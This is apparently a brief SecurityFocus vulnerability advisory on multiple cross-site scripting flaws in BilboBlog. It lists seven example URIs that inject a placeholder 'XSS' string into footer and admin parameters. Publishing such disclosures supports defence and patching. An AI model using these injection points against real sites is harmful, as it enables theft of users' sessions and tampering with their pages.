BilboBlog Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS
http://www.example.com/bilboblog/admin/?content=</textarea>XSS
http://www.example.com/bilboblog/admin/homelink.php?url=">XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS


 

Privacy Statement
Copyright 2010, SecurityFocus